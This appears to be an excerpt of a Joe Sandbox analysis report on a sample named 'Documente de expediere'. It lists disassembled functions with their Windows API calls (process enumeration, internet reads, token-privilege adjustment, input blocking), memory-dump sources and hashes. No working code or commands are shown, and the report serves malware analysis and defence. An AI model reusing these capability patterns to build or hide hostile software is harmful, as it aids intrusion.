                                                • Opcode Fuzzy Hash: a60ed6d944417dbe3287303862ad37ca2066bf9a905175c77519c34d6315fac3
                                                • Instruction Fuzzy Hash: 4CA12971108305AFD740EF58C881EABB7EDEF94714F00492CF156971A2EB70EA49CB66
                                                Function 0070C304 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,006D1D88,?), ref: 0070C312
                                                • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0070C324
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                • API String ID: 2574300362-1816364905
                                                • Opcode ID: 5e616ee490dbc9c6ef599db285cb1b937d3c203fa457feb65f07d0e2ec592658
                                                • Instruction ID: 698f322903682863e61dd4d806f874f0fbef23ae557813e3fab3c5df3d1c8af9
                                                • Opcode Fuzzy Hash: 5e616ee490dbc9c6ef599db285cb1b937d3c203fa457feb65f07d0e2ec592658
                                                • Instruction Fuzzy Hash: A9E0ECB4610713DFDB214F29D804A96B6D4EB08755B80C639E895D22A0E77CD880DB61
                                                Function 0070F121 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 0070F151
                                                • Process32FirstW.KERNEL32(00000000,?), ref: 0070F15F
                                                  • Part of subcall function 00697F41: _memmove.LIBCMT ref: 00697F82
                                                • Process32NextW.KERNEL32(00000000,?), ref: 0070F21F
                                                • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0070F22E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                • String ID:
                                                • API String ID: 2576544623-0
                                                • Opcode ID: f53fea8b9ac7eef33a4d7d4c856e632acde1004c97ecd7a7f695df4b9b81fc6e
                                                • Instruction ID: 95d33708f787fbc9e96b24abe861455184efc1fa84eb12391f399f75b20fad7e
                                                • Opcode Fuzzy Hash: f53fea8b9ac7eef33a4d7d4c856e632acde1004c97ecd7a7f695df4b9b81fc6e
                                                • Instruction Fuzzy Hash: 3D518C71504300AFD760EF24DC85A6BBBE9FF94710F10492DF596972A1EB30A908CB96
                                                Function 006EEB07 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 006EEB19
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: lstrlen
                                                • String ID: ($|
                                                • API String ID: 1659193697-1631851259
                                                • Opcode ID: 54ebb2c11b631db4d80f324108ca87e41ea23c12bcc6e7ddd4f2e32e2b12e0ef
                                                • Instruction ID: c8b7c9eea671c93ebb4fe1bea59fa25150ed3f6362c9ef19752a22f897dd6336
                                                • Opcode Fuzzy Hash: 54ebb2c11b631db4d80f324108ca87e41ea23c12bcc6e7ddd4f2e32e2b12e0ef
                                                • Instruction Fuzzy Hash: 31324774A017459FD728CF19C481AAAB7F1FF48320B15C56EE89ACB3A1E771E981CB44
                                                Function 007025E2 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 007026D5
                                                • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 0070270C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Internet$AvailableDataFileQueryRead
                                                • String ID:
                                                • API String ID: 599397726-0
                                                • Opcode ID: caf942d958f56cb5fca9ad31c6de4d9162a80569fd58788084b8c6595f32701d
                                                • Instruction ID: a543c53d2c003a8c5fe43d86b600ce6295448cfc27abfaa0a412f8ebb018112d
                                                • Opcode Fuzzy Hash: caf942d958f56cb5fca9ad31c6de4d9162a80569fd58788084b8c6595f32701d
                                                • Instruction Fuzzy Hash: C941C772500209FFEB20DA54DC89EBBB7FCEB40714F10416EF605A65C2DA7A9D829754
                                                Function 006FB59E Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 006FB5AE
                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 006FB608
                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 006FB655
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ErrorMode$DiskFreeSpace
                                                • String ID:
                                                • API String ID: 1682464887-0
                                                • Opcode ID: 024545b31f37fdc0ec996d8f4d95ccd8eab52f089699f4a0c6a63f2d975857e8
                                                • Instruction ID: 99c48c345f9f435c47dd7708459b969162b4937ae82a2b1b043da82ee6ad6e0a
                                                • Opcode Fuzzy Hash: 024545b31f37fdc0ec996d8f4d95ccd8eab52f089699f4a0c6a63f2d975857e8
                                                • Instruction Fuzzy Hash: 4C216035A00618EFCB00EF69D880AEDBBB9FF49310F1480ADE905EB351DB319916CB59
                                                Function 006E8CC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 006B0FF6: std::exception::exception.LIBCMT ref: 006B102C
                                                  • Part of subcall function 006B0FF6: __CxxThrowException@8.LIBCMT ref: 006B1041
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006E8D0D
                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 006E8D3A
                                                • GetLastError.KERNEL32 ref: 006E8D47
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                • String ID:
                                                • API String ID: 1922334811-0
                                                • Opcode ID: 4c689a5ae0299fbb66ddfc5992f0eea0a7cf059a8e4e498453d9f71ca0ff220e
                                                • Instruction ID: de931cde6ea11790d73c5af4925b2d4ad337bfe0d5c1ec2b59d49d4f7dc88e3c
                                                • Opcode Fuzzy Hash: 4c689a5ae0299fbb66ddfc5992f0eea0a7cf059a8e4e498453d9f71ca0ff220e
                                                • Instruction Fuzzy Hash: D111BFB1515308AFE728EF58DC85DABB7BDEF04710B20C52EF85A83241EB30AC408B24
                                                Function 006F4021 Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 006F404B
                                                • DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 006F4088
                                                • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 006F4091
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: CloseControlCreateDeviceFileHandle
                                                • String ID:
                                                • API String ID: 33631002-0
                                                • Opcode ID: f94ed36e837a78b94730d23dde83d06bf9ddd3ab9be835f383e8e36f14003a7e
                                                • Instruction ID: 6aaea6423fea910671f730ee20ca754a5f895c57b0cfa215f9c93d30506a7e0c
                                                • Opcode Fuzzy Hash: f94ed36e837a78b94730d23dde83d06bf9ddd3ab9be835f383e8e36f14003a7e
                                                • Instruction Fuzzy Hash: FC113CB1904228BEE7109BECDC45FFFBBBCEB08750F104656FA04E7291DAB8594587A1
                                                Function 006F4C03 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 006F4C2C
                                                • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 006F4C43
                                                • FreeSid.ADVAPI32(?), ref: 006F4C53
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: AllocateCheckFreeInitializeMembershipToken
                                                • String ID:
                                                • API String ID: 3429775523-0
                                                • Opcode ID: 2292f11ee986aba09917d42defcf006bd40d0e9ca550cc2811ca00aea5f1b766
                                                • Instruction ID: 45e30f0c6408251edb5937f638af8b89b3259cb791a7b060165e684ca1aa0e68
                                                • Opcode Fuzzy Hash: 2292f11ee986aba09917d42defcf006bd40d0e9ca550cc2811ca00aea5f1b766
                                                • Instruction Fuzzy Hash: CAF03C75A1120CBBDB04DFE49C89AEEB7B8EB08211F008469E601E2191D6745A048B54
                                                Function 006F8B13 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON
                                                Download Yara Rule
                                                APIs
                                                • __time64.LIBCMT ref: 006F8B25
                                                  • Part of subcall function 006B543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,006F91F8,00000000,?,?,?,?,006F93A9,00000000,?), ref: 006B5443
                                                  • Part of subcall function 006B543A: __aulldiv.LIBCMT ref: 006B5463
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Time$FileSystem__aulldiv__time64
                                                • String ID: 0uu
                                                • API String ID: 2893107130-2836214914
                                                • Opcode ID: 4895cecf4bd7252d2d1cbd3dbbba192cb39449720e96550da2f4b74ac749dba2
                                                • Instruction ID: 0c34bc01d94a746e917e9b309f8cbed11b45bdb7b555c09b7d3c6c89b148bdc5
                                                • Opcode Fuzzy Hash: 4895cecf4bd7252d2d1cbd3dbbba192cb39449720e96550da2f4b74ac749dba2
                                                • Instruction Fuzzy Hash: 2621E472635614CFC729CF25D841AA2B3E2EBA4311B288E6CD1E5CB2D0CA74BD45CB94
                                                Function 0069E060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cf69725a73cb4d16d8c49727fbb85fe1bb24e7d1c4ea24ad94925027e0802017
                                                • Instruction ID: b007a017badbe3f417ca035b85d45acf02736aaeb68bc1f01ebaa8f9cb77f254
                                                • Opcode Fuzzy Hash: cf69725a73cb4d16d8c49727fbb85fe1bb24e7d1c4ea24ad94925027e0802017
                                                • Instruction Fuzzy Hash: 56229C74A00215DFDF24DF58C480ABEBBFAFF04300F14856AE856AB751E736A985CB91
                                                Function 006FC93C Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?), ref: 006FC966
                                                • FindClose.KERNEL32(00000000), ref: 006FC996
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Find$CloseFileFirst
                                                • String ID:
                                                • API String ID: 2295610775-0
                                                • Opcode ID: 02765e3c37cb4e9d3f57d4ec265a71051284aa3ee902048aa13ff82247e43efa
                                                • Instruction ID: 154a53ac6e637ede61df61571d0e174225d1717e354fdb554f116bd3c999421e
                                                • Opcode Fuzzy Hash: 02765e3c37cb4e9d3f57d4ec265a71051284aa3ee902048aa13ff82247e43efa
                                                • Instruction Fuzzy Hash: 69118E326006049FDB10EF29C845A6AF7EAFF84320F00C51EF9A9D7291DB74AC01CB95
                                                Function 006FA2D5 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0070977D,?,0071FB84,?), ref: 006FA302
                                                • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0070977D,?,0071FB84,?), ref: 006FA314
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ErrorFormatLastMessage
                                                • String ID:
                                                • API String ID: 3479602957-0
                                                • Opcode ID: 00c1c45a00112845c702682e19634e490b27b7cd02358515ef0bd8f8e258e3d9
                                                • Instruction ID: 17e7b5e8e1be91b7b98d8e94348f849f7d88ed9b95baad8b5cfdd53c595fb9a9
                                                • Opcode Fuzzy Hash: 00c1c45a00112845c702682e19634e490b27b7cd02358515ef0bd8f8e258e3d9
                                                • Instruction Fuzzy Hash: BFF0823554422DABDB10AFA4CC49FFA776EFF09761F00C169F919D7181D6309940CBA5
                                                Function 006E8713 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                Download Yara Rule
                                                APIs
                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,006E8851), ref: 006E8728
                                                • CloseHandle.KERNEL32(?,?,006E8851), ref: 006E873A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: AdjustCloseHandlePrivilegesToken
                                                • String ID:
                                                • API String ID: 81990902-0
                                                • Opcode ID: e8087d5c248f9bac347a9cf8723ad7574c6a5c6411d28117d1830c2d96a48fa5
                                                • Instruction ID: b4fa269763f19cc8a095acf1eba0c0a743314dbd2df35c08b3528f5a5a64f45d
                                                • Opcode Fuzzy Hash: e8087d5c248f9bac347a9cf8723ad7574c6a5c6411d28117d1830c2d96a48fa5
                                                • Instruction Fuzzy Hash: 9DE0B676010650EEEB652B65ED09DB77BAAEB04350724C92DF49A84470DB62ACD0DB14
                                                Function 006BA395 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,006B8F97,?,?,?,00000001), ref: 006BA39A
                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 006BA3A3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: 0d4102ae7e0c4e66400206550c11ad2850cd6f30ab7042fdfda8bd6487b359e6
                                                • Instruction ID: 4c89e8386ef48c08879af788833d57eb997205edbe68495228d50cdb18ea6403
                                                • Opcode Fuzzy Hash: 0d4102ae7e0c4e66400206550c11ad2850cd6f30ab7042fdfda8bd6487b359e6
                                                • Instruction Fuzzy Hash: 1BB09231054208EBCA002B99EC09BC83F68FB44BA2F40C020F61D840A0CB6654508A99
                                                Function 006BF419 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5969569ff40a09d5d127e25e4e74944bbdd44b077d757d6f0c5031db352075b0
                                                • Instruction ID: 2749e26546b9c9519dfb906bc32afff67ed73ac4102c40411bb23b4930970667
                                                • Opcode Fuzzy Hash: 5969569ff40a09d5d127e25e4e74944bbdd44b077d757d6f0c5031db352075b0
                                                • Instruction Fuzzy Hash: A63237A2D29F414DD7275638DD32376A689AFB73C4F14D737E819B5AA6DB28C4C34200
                                                Function 006C267E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f325296d28f4ee0653ce4c757f7304058be59d26c47fb0cf5b165bf76a0dfbbd
                                                • Instruction ID: 42ffcbf7e92c9742e469e49aecdc4890a660ae68e1670c130f4a2b28c63d0bd1
                                                • Opcode Fuzzy Hash: f325296d28f4ee0653ce4c757f7304058be59d26c47fb0cf5b165bf76a0dfbbd
                                                • Instruction Fuzzy Hash: 2FB10020D2AF414ED723A6398831336BB5CAFBB6D5F51D71BFC2670D22EB2585834145
                                                Function 007041FD Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                • BlockInput.USER32(00000001), ref: 00704218
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: BlockInput
                                                • String ID:
                                                • API String ID: 3456056419-0
                                                • Opcode ID: d4f0f653be03cd218742a8304dffd61bdd59bfc1abba61453ccc43fda0fbc235
                                                • Instruction ID: fc053adaa1dd4c6ce32801615dc7f9ff142d77158b909136cc5b761a428d6211
                                                • Opcode Fuzzy Hash: d4f0f653be03cd218742a8304dffd61bdd59bfc1abba61453ccc43fda0fbc235
                                                • Instruction Fuzzy Hash: 53E01A712402149FCB10AF5AD844A9AB7EDAFA4760F00802AF949C77A2DA74E8418BA4
                                                Function 006F4EF5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                Download Yara Rule
                                                APIs
                                                • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 006F4F18
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
